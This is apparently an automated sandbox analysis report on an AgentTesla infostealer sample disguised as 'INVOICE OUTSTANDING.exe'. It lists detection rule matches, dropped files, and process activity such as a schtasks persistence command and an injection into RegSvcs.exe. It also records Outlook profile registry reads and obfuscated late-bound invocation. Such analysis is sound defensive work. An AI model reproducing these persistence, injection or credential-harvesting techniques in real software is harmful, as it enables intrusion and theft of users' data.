            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: INVOICE OUTSTANDING.exe
            .NET source code contains very large array initializations
            Source: 14.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB0E6175Au002d5157u002d4EA6u002d8358u002dF3F5E689E6E9u007d/CD42D637u002dB157u002d4DF1u002d910Bu002d590510BF5A22.csLarge array initialization: .cctor: array initializer size 11496
            .NET source code contains very large strings
            Source: INVOICE OUTSTANDING.exe, AddCompanyForm.csLong String: Length: 20037
            Source: ahgeNfsrA.exe.0.dr, AddCompanyForm.csLong String: Length: 20037
            Source: 0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack, AddCompanyForm.csLong String: Length: 20037
            Source: INVOICE OUTSTANDING.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
            Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_014BE8100_2_014BE810
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_014BE8200_2_014BE820
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_014BBF540_2_014BBF54
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B96280_2_078B9628
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B3E700_2_078B3E70
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B2D000_2_078B2D00
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B54780_2_078B5478
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B63A80_2_078B63A8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BD3F00_2_078BD3F0
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B86AB0_2_078B86AB
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B86B00_2_078B86B0
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B96270_2_078B9627
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BDD900_2_078BDD90
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B3DE20_2_078B3DE2
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B45180_2_078B4518
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B84800_2_078B8480
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B84900_2_078B8490
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BC4D80_2_078BC4D8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B44D80_2_078B44D8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B44500_2_078B4450
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B546B0_2_078B546B
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B8B000_2_078B8B00
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B8B100_2_078B8B10
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BCB200_2_078BCB20
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BE3600_2_078BE360
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B62B50_2_078B62B5
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BDAD80_2_078BDAD8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B72E90_2_078B72E9
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B72F80_2_078B72F8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B625B0_2_078B625B
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B89380_2_078B8938
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B89480_2_078B8948
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BD8B80_2_078BD8B8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_083200400_2_08320040
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_083220B90_2_083220B9
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_083200060_2_08320006
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_083221DF0_2_083221DF
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_0832026A0_2_0832026A
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_083202AE0_2_083202AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0169EFB814_2_0169EFB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0169FBD014_2_0169FBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0169608014_2_01696080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0169F30014_2_0169F300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6C08014_2_06C6C080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61D2814_2_06C61D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6632814_2_06C66328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6333014_2_06C63330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C641D114_2_06C641D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D1422814_2_06D14228
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D14F8814_2_06D14F88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D12D6814_2_06D12D68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D116C814_2_06D116C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D98AD814_2_06D98AD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D9B68014_2_06D9B680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D90AB014_2_06D90AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D9C6A014_2_06D9C6A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D92F6814_2_06D92F68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D95D9014_2_06D95D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D98AC714_2_06D98AC7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D9C63C14_2_06D9C63C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D96BC814_2_06D96BC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D96D0814_2_06D96D08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D9B53014_2_06D9B530
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexbHwaYRFftTggpxGZzIM.exe4 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.340774998.0000000003E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.333821911.0000000002E11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.350083466.00000000077D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.295352536.00000000035D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000000.253277318.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexbHwaYRFftTggpxGZzIM.exe4 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.344196351.000000000479C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exeBinary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: ahgeNfsrA.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
            Source: INVOICE OUTSTANDING.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ahgeNfsrA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: INVOICE OUTSTANDING.exeReversingLabs: Detection: 37%
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile read: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeJump to behavior
            Source: INVOICE OUTSTANDING.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe "C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1Jump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}Jump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile created: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile created: C:\Users\user\AppData\Local\Temp\tmp69D2.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@11/8@1/1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: INVOICE OUTSTANDING.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMutant created: \Sessions\1\BaseNamedObjects\RcVQRTaRQnykjShrHjGChRlqXGx
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:504:120:WilError_01
            Source: INVOICE OUTSTANDING.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
            Source: INVOICE OUTSTANDING.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
            Source: 14.0.RegSvcs.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 14.0.RegSvcs.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: INVOICE OUTSTANDING.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: INVOICE OUTSTANDING.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.551379171.00000000067DD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000003.378901648.00000000067E7000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: INVOICE OUTSTANDING.exe, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
            Source: ahgeNfsrA.exe.0.dr, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
            Source: 0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B5E81 push edi; retf 0_2_078B5E84
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B5E86 push edi; retf 0_2_078B5E8B
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_08324FD5 push dword ptr [edx+ebp*2-75h]; iretd 0_2_08324FDF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C617E9 push es; ret 14_2_06C618C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61789 push es; ret 14_2_06C618C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6177F push es; ret 14_2_06C618C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C63330 push es; iretd 14_2_06C641D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C618CB push es; ret 14_2_06C61910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C618AF push es; ret 14_2_06C61910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C618B3 push es; ret 14_2_06C61910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C60040 push es; ret 14_2_06C618C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61867 push es; ret 14_2_06C618C4
